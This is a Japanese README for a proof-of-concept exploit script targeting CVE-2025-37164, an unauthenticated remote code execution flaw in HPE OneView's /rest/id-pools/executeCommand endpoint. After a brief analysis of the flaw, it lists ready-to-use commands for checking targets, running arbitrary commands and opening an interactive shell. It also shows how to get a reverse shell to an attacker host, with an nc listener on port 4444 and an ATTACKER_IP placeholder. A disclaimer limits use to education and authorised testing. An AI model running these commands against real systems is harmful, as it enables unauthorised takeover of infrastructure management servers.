
CVE-2025-37164の概念実証エクスプロイト。HPE OneViewの/rest/id-pools/executeCommandエンドポイントを介した、認証不要の重大なリモートコード実行の脆弱性です。
HPE OneView における重大な(CVSS 10.0)未認証リモートコード実行脆弱性 CVE-2025-37164 の概念実証エクスプロイトです。
本ソフトウェアは教育目的および許可されたセキュリティテスト目的でのみ提供されます。
技術的分析: 脆弱性は PUT /rest/id-pools/executeCommand エンドポイントに存在します。このエンドポイントは認証を必要とせず、ユーザー制御の入力を Runtime.exec() に直接渡します。
requests ライブラリ(pip install requests)# ターゲットが脆弱かテスト
python3 cve-2025-37164.py -t http://target-ip --check
# 単一コマンドの実行
python3 cve-2025-37164.py -t http://target-ip -c "id"
# インタラクティブコマンドシェル
python3 cve-2025-37164.py -t http://target-ip -i
# リバースシェルの試行(リスナーが必要)
# 攻撃側マシンで: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444